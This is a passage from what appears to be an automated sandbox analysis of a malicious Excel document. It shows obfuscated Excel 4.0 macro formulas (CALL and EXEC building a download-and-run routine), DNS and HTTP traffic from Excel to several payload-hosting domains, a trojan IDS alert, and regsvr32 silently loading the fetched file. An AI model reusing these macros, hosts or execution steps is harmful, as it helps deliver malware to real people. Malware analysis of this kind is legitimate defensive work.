XMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&""1""&"".dll"",0,0)",,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0

      Network Behavior

      Snort IDS Alerts

      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      04/07/21-09:15:05.069854TCP2009897ET TROJAN Possible Windows executable sent when remote host claims to send html content8049171111.118.215.222192.168.2.22

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Apr 7, 2021 09:15:00.919925928 CEST4916780192.168.2.228.211.4.209
      Apr 7, 2021 09:15:00.938839912 CEST80491678.211.4.209192.168.2.22
      Apr 7, 2021 09:15:00.938941002 CEST4916780192.168.2.228.211.4.209
      Apr 7, 2021 09:15:00.939644098 CEST4916780192.168.2.228.211.4.209
      Apr 7, 2021 09:15:01.000272989 CEST80491678.211.4.209192.168.2.22
      Apr 7, 2021 09:15:01.327353001 CEST80491678.211.4.209192.168.2.22
      Apr 7, 2021 09:15:01.327575922 CEST4916780192.168.2.228.211.4.209
      Apr 7, 2021 09:15:01.327745914 CEST4916780192.168.2.228.211.4.209
      Apr 7, 2021 09:15:01.345602989 CEST80491678.211.4.209192.168.2.22
      Apr 7, 2021 09:15:01.642882109 CEST4916880192.168.2.228.211.4.209
      Apr 7, 2021 09:15:01.661051989 CEST80491688.211.4.209192.168.2.22
      Apr 7, 2021 09:15:01.661165953 CEST4916880192.168.2.228.211.4.209
      Apr 7, 2021 09:15:01.662440062 CEST4916880192.168.2.228.211.4.209
      Apr 7, 2021 09:15:01.720390081 CEST80491688.211.4.209192.168.2.22
      Apr 7, 2021 09:15:02.063385963 CEST80491688.211.4.209192.168.2.22
      Apr 7, 2021 09:15:02.063426018 CEST80491688.211.4.209192.168.2.22
      Apr 7, 2021 09:15:02.063682079 CEST4916880192.168.2.228.211.4.209
      Apr 7, 2021 09:15:02.063886881 CEST4916880192.168.2.228.211.4.209
      Apr 7, 2021 09:15:02.082295895 CEST80491688.211.4.209192.168.2.22
      Apr 7, 2021 09:15:02.227967978 CEST4916980192.168.2.22192.185.56.250
      Apr 7, 2021 09:15:02.368988037 CEST8049169192.185.56.250192.168.2.22
      Apr 7, 2021 09:15:02.369075060 CEST4916980192.168.2.22192.185.56.250
      Apr 7, 2021 09:15:02.370420933 CEST4916980192.168.2.22192.185.56.250
      Apr 7, 2021 09:15:02.511811972 CEST8049169192.185.56.250192.168.2.22
      Apr 7, 2021 09:15:02.678519964 CEST8049169192.185.56.250192.168.2.22
      Apr 7, 2021 09:15:02.678713083 CEST4916980192.168.2.22192.185.56.250
      Apr 7, 2021 09:15:02.679001093 CEST8049169192.185.56.250192.168.2.22
      Apr 7, 2021 09:15:02.679055929 CEST4916980192.168.2.22192.185.56.250
      Apr 7, 2021 09:15:03.095360994 CEST4917080192.168.2.22103.211.216.55
      Apr 7, 2021 09:15:03.236845970 CEST8049170103.211.216.55192.168.2.22
      Apr 7, 2021 09:15:03.236989975 CEST4917080192.168.2.22103.211.216.55
      Apr 7, 2021 09:15:03.238714933 CEST4917080192.168.2.22103.211.216.55
      Apr 7, 2021 09:15:03.379930973 CEST8049170103.211.216.55192.168.2.22
      Apr 7, 2021 09:15:04.319272041 CEST8049170103.211.216.55192.168.2.22
      Apr 7, 2021 09:15:04.319385052 CEST4917080192.168.2.22103.211.216.55
      Apr 7, 2021 09:15:04.322556973 CEST8049170103.211.216.55192.168.2.22
      Apr 7, 2021 09:15:04.322618008 CEST4917080192.168.2.22103.211.216.55
      Apr 7, 2021 09:15:04.757160902 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:04.909230947 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:04.909307957 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:04.909897089 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.061911106 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.069854021 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.069907904 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.069946051 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.069962025 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.069993019 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.069997072 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.070035934 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.070048094 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.070066929 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.070092916 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.070121050 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.070123911 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.070166111 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.070178032 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.070204973 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.070215940 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.070241928 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.070265055 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.070295095 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.075287104 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.222563028 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222589016 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222600937 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222616911 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222716093 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222773075 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222807884 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222825050 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.222858906 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222881079 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.222891092 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.222898960 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222946882 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.222951889 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.222999096 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223002911 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223022938 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223031998 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223054886 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223071098 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223072052 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223112106 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223112106 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223133087 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223151922 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223151922 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223191023 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223208904 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223228931 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223232031 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223253012 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.223280907 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.223311901 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.225841045 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.228734970 CEST4917180192.168.2.22111.118.215.222
      Apr 7, 2021 09:15:05.376903057 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.376960993 CEST8049171111.118.215.222192.168.2.22
      Apr 7, 2021 09:15:05.376991987 CEST8049171111.118.215.222192.168.2.22

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Apr 7, 2021 09:15:00.593981028 CEST5219753192.168.2.228.8.8.8
      Apr 7, 2021 09:15:00.904869080 CEST53521978.8.8.8192.168.2.22
      Apr 7, 2021 09:15:01.338613033 CEST5309953192.168.2.228.8.8.8
      Apr 7, 2021 09:15:01.638679981 CEST53530998.8.8.8192.168.2.22
      Apr 7, 2021 09:15:02.082560062 CEST5283853192.168.2.228.8.8.8
      Apr 7, 2021 09:15:02.225878000 CEST53528388.8.8.8192.168.2.22
      Apr 7, 2021 09:15:02.689320087 CEST6120053192.168.2.228.8.8.8
      Apr 7, 2021 09:15:03.091237068 CEST53612008.8.8.8192.168.2.22
      Apr 7, 2021 09:15:04.330058098 CEST4954853192.168.2.228.8.8.8
      Apr 7, 2021 09:15:04.754915953 CEST53495488.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Apr 7, 2021 09:15:00.593981028 CEST192.168.2.228.8.8.80xfda2Standard query (0)katelynn9506a.ru.comA (IP address)IN (0x0001)
      Apr 7, 2021 09:15:01.338613033 CEST192.168.2.228.8.8.80x5115Standard query (0)corwin-tommie06f.ru.comA (IP address)IN (0x0001)
      Apr 7, 2021 09:15:02.082560062 CEST192.168.2.228.8.8.80x78b6Standard query (0)kautilyaclasses.comA (IP address)IN (0x0001)
      Apr 7, 2021 09:15:02.689320087 CEST192.168.2.228.8.8.80x9610Standard query (0)kullumanalitours.comA (IP address)IN (0x0001)
      Apr 7, 2021 09:15:04.330058098 CEST192.168.2.228.8.8.80xed69Standard query (0)bodylanguage.santulan.co.inA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Apr 7, 2021 09:15:00.904869080 CEST8.8.8.8192.168.2.220xfda2No error (0)katelynn9506a.ru.com8.211.4.209A (IP address)IN (0x0001)
      Apr 7, 2021 09:15:01.638679981 CEST8.8.8.8192.168.2.220x5115No error (0)corwin-tommie06f.ru.com8.211.4.209A (IP address)IN (0x0001)
      Apr 7, 2021 09:15:02.225878000 CEST8.8.8.8192.168.2.220x78b6No error (0)kautilyaclasses.com192.185.56.250A (IP address)IN (0x0001)
      Apr 7, 2021 09:15:03.091237068 CEST8.8.8.8192.168.2.220x9610No error (0)kullumanalitours.com103.211.216.55A (IP address)IN (0x0001)
      Apr 7, 2021 09:15:04.754915953 CEST8.8.8.8192.168.2.220xed69No error (0)bodylanguage.santulan.co.in111.118.215.222A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • katelynn9506a.ru.com
      • corwin-tommie06f.ru.com
      • kautilyaclasses.com
      • kullumanalitours.com
      • bodylanguage.santulan.co.in

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.22491678.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Apr 7, 2021 09:15:00.939644098 CEST0OUTGET /index.html HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: katelynn9506a.ru.com
      Connection: Keep-Alive
      Apr 7, 2021 09:15:01.327353001 CEST1INHTTP/1.1 503 Service Unavailable
      Date: Wed, 07 Apr 2021 07:15:00 GMT
      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
      X-Powered-By: PHP/5.4.16
      Content-Length: 78
      Connection: close
      Content-Type: text/html; charset=UTF-8
      Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
      Data Ascii: <h1>Not Found.</h1>The requested URL /index.html was not found on this server.


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.22491688.211.4.20980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Apr 7, 2021 09:15:01.662440062 CEST2OUTGET /index.html HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: corwin-tommie06f.ru.com
      Connection: Keep-Alive
      Apr 7, 2021 09:15:02.063385963 CEST2INHTTP/1.1 503 Service Unavailable
      Date: Wed, 07 Apr 2021 07:15:01 GMT
      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
      X-Powered-By: PHP/5.4.16
      Content-Length: 78
      Connection: close
      Content-Type: text/html; charset=UTF-8
      Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
      Data Ascii: <h1>Not Found.</h1>The requested URL /index.html was not found on this server.


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.2249169192.185.56.25080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Apr 7, 2021 09:15:02.370420933 CEST3OUTGET /ds/index.html HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: kautilyaclasses.com
      Connection: Keep-Alive
      Apr 7, 2021 09:15:02.678519964 CEST3INHTTP/1.1 503 Service Unavailable
      Date: Wed, 07 Apr 2021 07:15:02 GMT
      Server: Apache
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Content-Length: 96
      Content-Type: text/html; charset=UTF-8
      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 07 72 43 32 52 15 8a 52 0b 4b 53 8b 4b 52 53 14 42 83 7c 14 f4 53 8a f5 33 f3 52 52 2b f4 32 4a 72 73 14 ca 13 8b 15 f2 80 7a d2 40 7a 14 f2 f3 14 4a 32 32 8b 15 8a 53 8b ca 52 8b f4 00 78 ca 54 b8 51 00 00 00
      Data Ascii: 0/Qp/KrC2RRKSKRSB|S3RR+2Jrsz@zJ22SRxTQ


      Session IDSource IPSource PortDestination IPDestination PortProcess
      3192.168.2.2249170103.211.216.5580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Apr 7, 2021 09:15:03.238714933 CEST4OUTGET /ds/index.html HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: kullumanalitours.com
      Connection: Keep-Alive
      Apr 7, 2021 09:15:04.319272041 CEST5INHTTP/1.1 503 Service Unavailable
      Date: Wed, 07 Apr 2021 07:15:03 GMT
      Server: Apache
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Content-Length: 96
      Content-Type: text/html; charset=UTF-8
      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 07 72 43 32 52 15 8a 52 0b 4b 53 8b 4b 52 53 14 42 83 7c 14 f4 53 8a f5 33 f3 52 52 2b f4 32 4a 72 73 14 ca 13 8b 15 f2 80 7a d2 40 7a 14 f2 f3 14 4a 32 32 8b 15 8a 53 8b ca 52 8b f4 00 78 ca 54 b8 51 00 00 00
      Data Ascii: 0/Qp/KrC2RRKSKRSB|S3RR+2Jrsz@zJ22SRxTQ


      Session IDSource IPSource PortDestination IPDestination PortProcess
      4192.168.2.2249171111.118.215.22280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Apr 7, 2021 09:15:04.909897089 CEST6OUTGET /ds/index.html HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: bodylanguage.santulan.co.in
      Connection: Keep-Alive
      Apr 7, 2021 09:15:05.069854021 CEST7INHTTP/1.1 200 OK
      Date: Wed, 07 Apr 2021 07:15:04 GMT
      Server: nginx/1.17.6
      Content-Type: text/html;charset=UTF-8
      Last-Modified: Wed, 31 Mar 2021 06:47:08 GMT
      Vary: Accept-Encoding
      Content-Encoding: gzip
      X-Server-Cache: true
      X-Proxy-Cache: HIT
      Transfer-Encoding: chunked
      Data Raw: 31 62 30 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 7d 7c 1c 57 79 36 7c c6 5a 25 33 d9 4d 2c a8 f8 36 25 c2 11 30 95 05 4c 57 06 4c 14 b0 52 c6 1f 79 99 58 1f 99 d5 87 23 29 94 08 82 c1 21 84 4c 52 da 67 a1 cb 41 84 c3 74 51 e9 96 16 da d2 2f a5 50 f0 53 1e da a5 90 44 6d d0 ae 3e 56 2b d9 fa 72 c9 07 31 44 36 13 5b 8e 84 b3 49 a6 d6 d8 99 78 9e fb 3e 67 bf 64 f3 7b de f7 fd e7 fd eb dd 9f 34 67 e6 9c 73 5f f7 75 5f d7 65 f4 fd 29 a9 21 84 84 e0 3f 08 08 79 98 88 df 6e f2 7f ff c3 bb d7 bd e5 d1 eb c8 8f 94 63 0d 0f 4b 1f 3e d6 70 db 5d 9f f8 ec f5 f7 dc fb e9 8f df fb 91 c3 d7 7f f4 23 77 df fd e9 fb ae ff fd a1 eb ef b5 ee be fe 13 77 5f ff a1 03 5d d7 1f fe f4 9d 43 ef bc f6 da 6b 6e 28 62 0c 76 87 7f fa a6 f7 0c ad 97 fe bf a1 de bf fe 5a 58 cf bc f6 81 f5 37 c2 da f9 89 8f de 85 fb 97 f7 6e d7 09 f9 b0 54 4b 16 cf 7e ec 8e d2 de 0a d9 d2 10 96 6a 24 f2 65 89 90 37 8a bd 4f 7e 1a 1e 75 f0 ff f7 12 e1 6f f8 be 45 cc 4b 48 65 ad de dc 42 c4 55 7e b7 bc 16 17 c0 b9 13 16 bf 20 91 d7 4b ff 0f 44 fa 7f fb 03 5c ff ff 70 fc ce 8f 82 80 b0 be 38 2c 09 42 38 6b 68 f3 9d eb 09 b9 e3 9d 77 7e e4 be 8f c0 fb 9d 45 ce 7c a8 af 6e 26 bc 1b fe 4a f7 38 d6 0f 8b f7 fe e4 8a 7b e3 ef bc 57 5c 4c 03 38 19 87 f3 b7 c2 fa b5 2b 04 18 2f e1 fd db d5 62 16 22 17 71 2f c3 fb 3f 8c f8 ff ff fe 3f fc 99 ec 59 3a e9 b6 77 74 c6 ba 6f 8a 3f 43 c8 67 64 cd 6e ca b6 91 b5 6b 37 68 78 a2 8d a0 73 6a e6 40 8e e2 e6 1d af 04 41 03 df ae 1c 86 75 ff c6 bf c6 c3 3f dc 9a d3 dd 53 97 82 80 9e 21 6a 5c 5e 53 e8 29 52 a3 cb 81 e1 ee bc e3 42 10 ec c4 cb 89 e7 bf 06 af 4a 1a 8b 87 75 37 47 3f ba d4 46 da 6a 08 d9 f5 ca 67 14 ca bf 82 b5 da c6 1d 70 49 b2 22 b6 e9 6e b7 71 ef 40 e2 08 56 fc 36 e4 9c 0e 79 a4 11 89 6f e8 de e7 e1 5a e2 dc e0 cb 41 a0 65 73 ba 9c 84 e8 ee df a7 4d ef 0b 0c 9f 77 a3 1b 12 6c 2f 07 41 50 8b 9f c3 86 cc 2b e9 f3 c1 f6 31 64 5c db e5 05 c1 b0 ee 0f 73 3e 9a e1 4b 7c f4 c4 f4 06 cc b9 fb 16 c9 94 f7 f2 82 06 4e 82 f2 91 03 31 39 60 06 f4 9c 14 70 59 b4 02 e5 85 24 71 d8 fd 59 2d 29 8a 33 06 63 ed db d0 5d 6c dd b0 d4 fc 17 57 11 1c f9 61 04 dc cd bc c1 81 be de 9e 7c 56 16 06 f8 c2 80 17 ee 22 e4 1e 79 cf 4e 44 5f bb 2a a0 cb f3 00 6e f9 39 dd c7 9d ed 86 4f 0d 9f 04 40 d8 f0 f7 53 cb 97 9a bf 00 03 48 a6 9f 38 f7 5e 78 d9 d0 7d ec b5 5d f7 c3 56 84 f2 e2 80 ce 10 9a 0f e8 90 4f 1a e2 fe 23 7c 7a 3d 22 ed 29 e9 90 d0 fd af 00 61 49 8f a8 46 a4 99 0f b5 02 1a d2 21 99 80 72 88 b6 87 ef ee 51 38 dc 4f b1 6c 27 3e b4 14 7e d7 e2 99 2d 68 6d d7 65 16 8f 6c e8 91 ef 00 60 91 31 1f 36 d0 e5 cd c3 16 d3 f6 48 2f 21 71 39 6a 7f 06 d3 f6 5b d4 7e cb 04 2a 38 14 79 0c 7b 60 6b 69 9e be 28 25 16 f6 6d 41 3c 2e 23 3d ec 4b f4 08 16 80 b1 1e 76 48 cc ff f1 45 58 74 9f 8e f6 cd 42 3d a5 08 23 d1 79 89 f7 2e ee 2a a0 47 9e 34 23 c4 5e 4e 9f cf 2f e9 7e 8e 22 d8 2f 81 71 e3 7b c0 9f 20 9d 9f 69 23 5d e6 ea d3 9f 83 5a c3 95 12 9c dd 14 0c a3 98 fe f6 14 82 41 9e 1f e3 a1 78 a2 f6 24 00 d2 73 81 f6 62 c0 af 05 7a 84 b7 68 98 09 38 ec 06 7f e2 4e e7 ea ec 67 01 9d 7f 07 86 77 c0 06 bd cd c8 76 cb 1d e6 74 81 7e 83 ee ee 51 e6 39 37 e9 3c dd 10 22 6f e8 32 b7 64 3a 60 ba ac e8 72 d8 f0 f6 51 ca 49 70 57 36 cb ea 09 59 95 ef 12 72 9f dc 90
      Data Ascii: 1b01}|Wy6|Z%3M,6%0LWLRyX#)!LRgAtQ/PSDm>V+r1D6[Ix>gd{4gs_u_e)!?yncK>p]#ww_]Ckn(bvZX7nTK~j$e7O~uoEKHeBU~ KD\p8,B8khw~E|n&J8{W\L8+/b"q/??Y:wto?Cgdnk7hxsj@Au?S!j\^S)RBJu7G?FjgpI"nq@V6yoZAesMwl/AP+1d\s>K|N19`pY$qY-)3c]lWa|V"yND_*n9O@SH8^x}]VO#|z=")aIF!rQ8Ol'>~-hmel`16H/!q9j[~*8y{`ki(%mA<.#=KvHEXtB=#y.*G4#^N/~"/q{ i#]ZAx$sbzh8Ngwvt~Q97<"o2d:`rQIpW6Yr


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:09:14:35
      Start date:07/04/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13faa0000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:09:14:43
      Start date:07/04/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -s ..\oeiwkd
      Imagebase:0xff580000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:09:14:43
      Start date:07/04/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -s
      Imagebase:0xff580000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:09:14:43
      Start date:07/04/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -s
      Imagebase:0xff580000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:09:14:43
      Start date:07/04/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -s
      Imagebase:0xff580000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:09:14:44
      Start date:07/04/2021
